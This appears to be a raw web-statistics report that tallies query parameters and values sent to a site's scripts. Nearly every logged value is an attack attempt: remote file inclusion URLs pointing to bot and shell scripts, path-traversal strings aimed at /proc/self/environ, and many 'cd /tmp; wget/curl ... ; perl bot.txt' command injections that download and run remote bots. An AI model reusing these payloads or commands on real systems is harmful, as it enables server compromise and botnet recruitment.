cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt ;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t xt	5
cd /tmp;rm sta.txt;wget http://189.24.36.96:9090/sta.txt;fet ch http://189.24.36.96:9090/sta.txt;lwp-download http://189. 24.36.96:9090/sta.txt;curl -O http://189.24.36.96:9090/sta.t xt;lynx http://189.24.36.96:9090/sta.txt;perl sta.txt;rm sta .txt?	4
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4 /srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt; lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http ://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf srz.txt*	4
Parameter	list
Value	Accesses
1	13
Parameter	path[docroot]
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	61
http://invisionar.hostinggratisargentina.com/eth0?	43
http://www.freewebs.com/sur00tseclan/httd.txt?	43
http://216.83.134.89/teste2bot.txt?	41
http://oon.web.id/r57?	39
http://www.oslutadores.com/?id=23530	36
http://www.freewebs.com/yahwek/sete.txt?	32
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	31
http://usuarios.arnet.com.ar/larry123/ka.txt?	28
	28
Parameter	path[docrs-for-live-51-de.html/skins/advanced/advanced1.php? pluginpath[0]
Value	Accesses
http://www.stdr.xpg.com.br/compito?	1
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	2,561
Script	Total Accesses
/wusage/summary/cgi.html//modules/xgallery/upgrade_album.php	2,999
Parameters by Submitted Value
Parameter	GALLERY_BASEDIR
Value	Accesses
	50
http://invisionar.hostinggratisargentina.com/eth0?	41
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	39
http://joaobenner.googlepages.com/script2.txt??	33
http://ownsirc.googlepages.com/botnet.txt?	27
http://www.lordxpl.xpg.com.br/own.txt??	26
http://yahwek.dll.googlepages.com/phpbot.txt?	23
http://normanzito.iespana.es/http.txt??	21
http://yugifire.t35.com/tool25.txt?	21
http://seideiaslegais.googlepages.com/own.txt??	20
Parameter	GALLERY_BASEDIRhttp://softhack.bravehost.com/themain.txt?
Value	Accesses
	1
Parameter	cmd
Value	Accesses
	2
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	25
cd /tmp;rm bot1.txt;wget http://yugifire.t35.com/bot1.txt;fe tch http://yugifire.t35.com/bot1.txt;lwp-download http://yug ifire.t35.com/bot1.txt;curl -O http://yugifire.t35.com/bot1. txt;lynx http://yugifire.t35.com/bot1.txt;perl bot1.txt	23
uname -a; id	10
cd /tmp; wget http://intranet.2circolovimercate.it/intro//mo dules/Forums/admin/scan.pl; curl -o scan.pl http://intranet. 2circolovimercate.it/intro//modules/Forums/admin/scan.pl; pe rl scan.pl	10
id	9
cd /tmp;rm -rf ownz;wget http://enigmax1.kit.net/ownz.txt;l wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit .net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt ;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per l ownz.txt;rm -rf ownz.txt	9
cd /tmp;wget http://deltaboogie.com/blog/modules/Forums/admi n/kk.txt;perl kk.txt h4h4	9
cd /tmp;rm -rf bot.txt;wget http://haddem.awardspace.com/bo t.txt.txt;lwp-download http://haddem.awardspace.com/bot.txt; fetch http://haddem.awardspace.com/bot.txt;curl -o bot.txt h ttp://haddem.awardspace.com/bot.txt;GET http://haddem.awards pace.com/bot.txt >bot.txt;lynx -source http://haddem.awardsp ace.com/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt	8
cd /tmp;wget http://www.1peninsulaintermedia.net/familytree/ bash/priv.txt;curl -O -f http://www.1peninsulaintermedia.net /familytree/bash/priv.txt;lynx -source http://www.1peninsula intermedia.net/familytree/bash/priv.txt;lwp-rget http://www. 1peninsulaintermedia.net/familytree/bash/priv.txt;fetch http ://www.1peninsulaintermedia.net/familytree/bash/priv.txt;per l priv.txt;rm -rf priv.txt;rm -rf priv001.txt	5
Parameter	list
Value	Accesses
1	4
Parameter	vid
Value	Accesses
41025634	1
OTHER:	2,582
Script	Total Accesses
/wusage/summary/cgi.html/modules/xfsection/modify.php	2,972
Parameters by Submitted Value
Parameter	*
Value	Accesses
http://www.superlab.jazztel.es/safe.gif?	8
http://77.90.4.28/safeon.txt??	1
Parameter	cmd
Value	Accesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	15
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3. ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt	14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	14
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	12
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	10
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	9
cd /tmp;killall -9 perl;wget http://72.1.85.234/1.txt;curl - O http://72.1.85.234/1.txt;fetch http://72.1.85.234/1.txt;lw p-download http://72.1.85.234/1.txt;wget http://72.1.85.234/ 2.txt;curl -O http://72.1.85.234/2.txt;fetch http://72.1.85. 234/2.txt;lwp-download http://72.1.85.234/2.txt;wget http:// 72.1.85.234/3.txt;curl -O http://72.1.85.234/3.txt;fetch htt p://72.1.85.234/3.txt;lwp-download http://72.1.85.234/3.txt; wget http://72.1.85.234/4.txt;curl -O http://72.1.85.234/4.t xt;fetch http://72.1.85.234/4.txt;lwp-download http://72.1.8 5.234/4.txt;wget http://72.1.85.234/5.txt;curl -O http://72. 1.85.234/5.txt;fetch http://72.1.85.234/5.txt;lwp-download h ttp://72.1.85.234/5.txt;wget http://72.1.85.234/6.txt;curl - O http://72.1.85.234/6.txt;fetch http://72.1.85.234/6.txt;lw p-download http://72.1.85.234/6.txt;perl 1.txt;perl 2.txt;pe rl 3.txt;perl 4.txt;perl 5.txt;perl 6.txt;rm -rf txt	9
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	9
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	8
uname -a; id	6
Parameter	dir_moduel
Value	Accesses
http://geocities.com/kiddiesSscript/injex.txt?	1
Parameter	dir_module
Value	Accesses
http://jackzard.110mb.com/r57?	101
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	57
http://ownsirc.googlepages.com/botnet.txt?	48
http://www.oslutadores.com/?id=23530	34
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	32
http://www.freewebs.com/yahwek/sete.txt?	30
http://www.freewebs.com/yahwek/phpbot.txt?	29
http://invisionar.hostinggratisargentina.com/eth0?	28
http://www.jungo8949.co.kr/tool25.txt?	27
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	24
Parameter	dir_modulehttp://www.geocities.com/greencoolest/Eny.txt?
Value	Accesses
	1
Parameter	list
Value	Accesses
1	18
OTHER:	2,427
Script	Total Accesses
/wusage/summary/cgi.html//components/com_rsgallery/rsgallery .html.php	2,871
Parameters by Submitted Value
Parameter
Value	Accesses
http://badmus.by.ru/id.txt?	1
Parameter	?v
Value	Accesses
	1
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	13
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	12
uname -a; id	11
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148 .32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf anaozao.txt	8
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	7
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	7
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	6
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
Parameter	http://www.endro.de/stammbaum/media/thumbs/TumbsInfo.txt?
Value	Accesses
	1
Parameter	list
Value	Accesses
1	1
Parameter	mosC4CMS.php?dir[inc]
Value	Accesses
http://www.ss3s.org/r57.txt?	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	53
http://www.jolieloves.com/mori/cmd.txt?	47
http://189.23.251.131/~tiago/new.txt?	43
http://invisionar.hostinggratisargentina.com/eth0?	37
http://www.freewebs.com/yahwek/phpbot.txt?	33
http://usuarios.arnet.com.ar/larry123/safe.txt?	32
http://www.neoncomanda.kit.net/tool25.dat?	30
http://ownsirc.googlepages.com/botnet.txt?	29
http://www.oslutadores.com/?id=23530	28
	24
Parameter	mosConfig_absolute_pathhttp://usuarios.arnet.com.ar/adrikras now/rfi/bla.txt?
Value	Accesses
	2
OTHER:	2,416
Script	Total Accesses
/wusage/weekly/2008/09/07/	2,773
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
	2
Parameter	_zb_path
Value	Accesses
http://www.aerothaiunion.com/sik.txt?	7
http://maehongson.nfe.go.th/budget3/image/id.jpg???	4
http://51ucn.com/xjarea/shz/help01.txt?????	4
http://www.mfa.gov.bt/kethek-id.txt???	3
http://www.j-vision.co.kr/company/hotel/index.php/bo.do??	2
http://www.aerothaiunion.com/sik.txt??	2
http://www.sbe.es/buggsbunny??	2
../../../../../../../../../../../../../../../../../../../../ ../../../../proc/self/environ	2
http://boostserver.com/fantastico/upload/bb/copyright.txt??? ?	2
http://barfod.no/modules/fx29id.txt??	2
Parameter	abs_path
Value	Accesses
http://www.lazar.ru/manager/processors/copyright.txt???	1
Parameter	custompluginfile
Value	Accesses
http://huhta-tv.org/idv6.txt????	1
http://basclan.org/idv6.txt?????	1
http://70.47.27.6/~autol/idv6.txt????	1
Parameter	custompluginfile[DOCUMENT_ROOT]
Value	Accesses
http://www.wemonmobila.info/mainlinks.dat??	15
Parameter	custompluginfile[]
Value	Accesses
http://www.nepspb.com/images/id6.txt????	7
http://www.clansuche24.de/CMD.txt??	4
http://vnc2009.webcindario.com/tst.txt??	4
http://www.lazar.ru/manager/processors/copyright.txt???	2
http://shemouth.nimunet.com/irc/id.txt????	2
http://www.geocities.com/axenses/id.txt???	2
http://aboutav.com//id1.txt?????	1
http://www.ipc-be.org/help01[1].txt???	1
http://sunandsea.co.kr/nalog/idku.txt????	1
http://www.thenakedtruckerandt-bones.com/reads.txt??	1
Parameter	custompluginfile[]http://gabifir.yourfreehosting.net/2?
Value	Accesses
	1
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.mykr.net/bbs/id.txt??	1
http://ambrosiasociety.org/zenphoto/cache/bo.do???	1
http://www.mykr.net/bbs/id.txt?	1
http://ambrosiasociety.org/zenphoto/cache/bo.do? ??	1
Parameter	mosConfig_admin_path
Value	Accesses
http://oursoultvxq.com/bbs/data/bbs/chi.txt??	1
http://cluster76.bannaipol.org/includes/chi.txt??	1
Parameter	option
Value	Accesses
com_poll	2
OTHER:	2,688
Script	Total Accesses
/wusage/weekly/2010/11/14/	2,721
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	52
1	1
Parameter	Option
Value	Accesses
com_myblog	34
com_google	6
Parameter	amp;view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	4
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	324
../../../../../../../../../../../../../../../proc/self/envir on	280
..//..//..//..//..//..//..//..///proc/self/environ 00	171
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	135
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	127
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	65
../../../../../../../../../../..//proc/self/environ 00	47
../../../../../../../../../../../../../../..//proc/self/envi ron	35
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n	29
//..//..//..//..//..//..//..//..///proc/self/environ 00	28
Parameter	option
Value	Accesses
com_google	1,034
com_fabrik	190
com_myblog	56
com_goole	10
com_pcchess	4
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	26
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	17
../../../../../../../../../../../../../../../proc/self/envir on	6
..//..//..//..//..//..//..//..///proc/self/environ 00	4
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	3
../../../../../../../../../../../../..//proc/self/environ 00	1
Parameter	view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	6
OTHER:	26
Script	Total Accesses
/wusage/summary/cgi.html/modules/tinycontent/admin/spaw/spaw _control.class.php	2,537
Parameters by Submitted Value
Parameter
Value	Accesses
	1
Parameter	cmd
Value	Accesses
uname -a; id	16
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per l botx2.txt;rm -rf txt	14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	11
id	7
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2. txt;rm -rf txt	7
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	6
cd /tmp;rm ng;wget http://ownz-you.com/ng.txt;fetch http:// ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt; curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/ ng.txt;perl ng.txt;rm -rf ng	6
cd /tmp;lwp-download http://h1.ripway.com/tsk7/botx2.txt;per l botx2.txt;rm -rf txt	5
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt ;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl -O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t xt	5
Parameter	list
Value	Accesses
1	13
Parameter	s
Value	Accesses
r	1
Parameter	spaw_root
Value	Accesses
http://jorgevolio.com/.cookies/safe.gif?	100
http://ownsirc.googlepages.com/botnet.txt?	34
http://h1.ripway.com/tsk4/cmd.txt?	31
http://invisionar.hostinggratisargentina.com/eth0?	27
http://www.freewebs.com/yahwek/sete.txt?	26
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	26
http://www.oslutadores.com/?id=23530	25
http://usuarios.arnet.com.ar/larry123/safe.txt?	20
http://www.freewebs.com/yahwek/phpbot.txt?	20
http://www.superlab.jazztel.es/safe.gif?	18
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	2,104
Script	Total Accesses
////	2,521
Parameters by Submitted Value
Parameter	CONFIG[main_path]
Value	Accesses
http://ourfathersworld.org/wp-content/themes/default/idxx.tx t??	4
Parameter	DOCUMENT_ROOT
Value	Accesses
http://vacancesgrandbornand.com/id1.php?	3
http://www.candidography.com/zero/id1.txt??	2
http://www.imoralro.com.br/forum/public/style_css/css_2/id1. txt???	2
http://www.medisite.fr/id????	2
http://lnx.mp3dmultimediastudio.it/demo/id1??	2
http://gumansin.com/id.txt??	1
http://www.hongik.ac.kr/hq/data/Tuxid.txt?	1
http://cocina.sur.es/editor/Idflp.txt?	1
http://www.exorsl.com/cst//encurs/Roseid.txt??	1
http://oursoultvxq.com/bbs/data/vip/id2.txt???	1
Parameter	DOCUMEN_ROOT[PATH]
Value	Accesses
http://www.howtolisten.kr//parti/data/admin/auto1.txt???	2
Parameter	GALLERY_BASEDIR
Value	Accesses
http://musicadelibreria.net/footer??	1
Parameter	Itemid
Value	Accesses
12	22
Parameter	Option
Value	Accesses
com_rwcards	6
Parameter	SERVER[DOCUMENT_ROOT]
Value	Accesses
http://www.iheard.us/language/pdf_fonts/id1.txt??	1
Parameter	_PHPLIB[libdir]
Value	Accesses
http://gbdata.co.uk/images/zd1.txt????	16
http://phamsight.com/docs/images/head??	12
http://antigua.granada.notariado.org//includes/id1.txt?	9
http://www.wvblazers.com//administrator/components/com_virtu emart/sql/other/c1.txt?	6
http://www.clearpathhealingarts.com/logs/.log?	4
http://newtabe.110mb.com/identi.jpg?	4
http://ourchat8.110mb.com/images/moncrot1.gif?	3
http://www.reducereuserecycle.com.au/core/id1.txt??	2
http://www.semihow.com/sh/amboard/compile/default_basic/admi n/mydb.txt??	2
http://www.howtolisten.kr/lct/exam3/81/auto1.txt????	2
Parameter	_SERVER[DOCUMENT_ROOT]
Value	Accesses
http://musicadelibreria.net/footer??	61
http://phamsight.com/docs/images/head??	38
http://alandar.net/www2/log1.txt?	29
../../../../../../../../../../../../../../../proc/self/envir on	15
\|echo "casper";echo "kae";\|	15
http://www.ohid.se/image??	13
http://www.koreadefence.net/data/shirohige/zfxid.txt??	13
http://aboutav.com//id1.txt???	13
http://www.lifeuniv.com/tmp/copyright.txt??	12
http://www.bk21bnt.com/bbs//icon/private_name/id1.txt??	12
Parameter	_gallery.php?_server[DOCUMENT_ROOT]
Value	Accesses
http://www.all3c.com///images/mono/20100907/app/functions/re sponse.txt?	2
OTHER:	2,186
Script	Total Accesses
/wusage/summary/cgi.html//components/com_galleria/galleria.h tml.php	2,256
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
uname -a; id	20
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	11
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www1.freewebs.c om/sur00tec/srz.txt;fetch http://www1.freewebs.com/sur00tec/ srz.txt;curl -o http://www1.freewebs.com/sur00tec/srz.txt;wg et http://www1.freewebs.com/sur00tec/srz.txt;perl srz.txt;rm srz.txt	7
id	6
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3 .ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt	6
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	6
cd /tmp;rm bot.txt;wget http://br.geocities.com/lucaslima07/ bot.txt;fetch http://br.geocities.com/lucaslima07/bot.txt;lw p-download http://br.geocities.com/lucaslima07/bot.txt;curl -O http://br.geocities.com/lucaslima07/bot.txt;lynx http://b r.geocities.com/lucaslima07/bot.txt;perl bot.txt	3
cd /tmp;rm enviar.txt;wget http://br.geocities.com/svconts/e nviar.txt;fetch http://br.geocities.com/svconts/enviar.txt;l wp-download http://br.geocities.com/svconts/enviar.txt;curl -O http://br.geocities.com/svconts/enviar.txt;lynx http://br .geocities.com/svconts/enviar.txt;perl enviar.txt	3
cd /tmp;killall perl -9;rm -rf *.txt;GET http://geocities.ya hoo.com.br/zcrew99/alan.txt > alan.txt;perl alan.txt;rm alan .txt	3
Parameter	list
Value	Accesses
1	13
Parameter	mosConfig_absolute_path
Value	Accesses
http://ownsirc.googlepages.com/botnet.txt?	41
http://www.jungo8949.co.kr/tool25.txt?	34
http://invisionar.hostinggratisargentina.com/eth0?	29
http://www.freewebs.com/yahwek/sete.txt?	28
http://usuarios.arnet.com.ar/larry123/safe.txt?	27
http://normanzito.iespana.es/http.txt??	24
	22
http://usuarios.arnet.com.ar/larry123/exploit.txt?	21
http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt ??	20
http://208.74.174.183/brizola.txt?	20
OTHER:	1,899
Script	Total Accesses
/wusage/weekly/2010/12/05/	2,229
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	88
11	2
27	1
Parameter	Option
Value	Accesses
com_myblog	58
com_google	6
Parameter	amp;view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	4
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	354
../../../../../../../../../../../../../../../proc/self/envir on	178
..//..//..//..//..//..//..//..///proc/self/environ 00	139
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	72
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	71
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	43
../../../../../../../../../../../../../../..//proc/self/envi ron	38
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n	24
//..//..//..//..//..//..//..//..///proc/self/environ 00	23
../../../../../../../../../../../../../../..//proc/self/envi ron 00	15
Parameter	option
Value	Accesses
com_google	792
com_fabrik	100
com_myblog	91
com_gcalendar	14
com_rokdownloads	6
com_product	2
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	39
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	30
..//..//..//..//..//..//..//..///proc/self/environ 00	16
../../../../../../../../../../../../../../../proc/self/envir on	6
Parameter	view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	6
OTHER:	11
Script	Total Accesses
/wusage/weekly/2010/11/21/	2,196
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	61
11	2
27	1
1	1
Parameter	Option
Value	Accesses
com_myblog	54
com_myfiles	10
com_google	5
com_product	2
Parameter	amp;view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	4
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	289
../../../../../../../../../../../../../../../proc/self/envir on	214
..//..//..//..//..//..//..//..///proc/self/environ 00	148
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	135
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	60
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	55
../../../../../../../../../../../../../../..//proc/self/envi ron	27
//..//..//..//..//..//..//..//..///proc/self/environ 00	16
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n	13
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// ..//..//..//..//..//..//..//..//..///proc/self/environ 00	10
Parameter	option
Value	Accesses
	2
com_google	731
com_fabrik	148
com_myblog	62
com_rwcards	31
com_product	4
com_myfiles	4
com_rwcards/?custompluginfile[]=../../../../../../../../../. ./../../../../../../../../../../../../../..//proc/self/envir on 00	2
com_rwcards/?custompluginfile[]=../../../../../../../../../. ./../../..//proc/self/environ 00	2
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	30
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	21
../../../../../../../../../../../../../../../proc/self/envir on	8
..//..//..//..//..//..//..//..///proc/self/environ 00	6
Parameter	view
Value	Accesses
rwcards	23
..//..//..//..//..//..//..//..///proc/self/environ 00	5
OTHER:	10
Script	Total Accesses
/wusage/summary/cgi.html//components/com_extcalendar/admin_e vents.php	2,192
Parameters by Submitted Value
Parameter	CONFIG_EXT[LANGUAGES_DIR
Value	Accesses
	1
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
	5
Parameter	CONFIG_EXT[LANGUAGES_DIR] http://human-design.ru/adm/faqsupp ort/config/tester.txt?
Value	Accesses
	1
Parameter	CONFIG_EXT[LANGUAGES_DIR] http://www.apocalypticduck.com/ski ns/advanced/config/tester.txt?
Value	Accesses
	1
Parameter	CONFIG_EXT[LANGUAGES_DIR] http://x-tal.ajou.ac.kr/zeroboard/ skin/zero_vote/tester.txt?
Value	Accesses
	2
Parameter	CONFIG_EXT[LANGUAGES_DIR]
Value	Accesses
http://ch3z.max-host.pl/z/z/k.txt?	138
http://www.jungo8949.co.kr/tool25.txt?	74
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt?	43
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?	37
http://invisionar.hostinggratisargentina.com/eth0?	34
	33
http://usuarios.arnet.com.ar/larry123/safe.txt?	28
http://ownsirc.googlepages.com/botnet.txt?	27
http://www.freewebtown.com/johnkid/tester.txt?	26
http://chez.ugu.pl/z/z/k.txt?	26
Parameter	CONFIG_EXT[LANGUAGES_DIR]\r
Value	Accesses
	2
Parameter	CONFIG_EXT[LANGUAGES_DIR]http://211.236.244.133/~axlonaxlon/ shell.txt?
Value	Accesses
	3
Parameter	CONFIG_EXT[LANGUAGES_DIR]http://82.195.129.64/~magnadon/shel l.txt?
Value	Accesses
	1
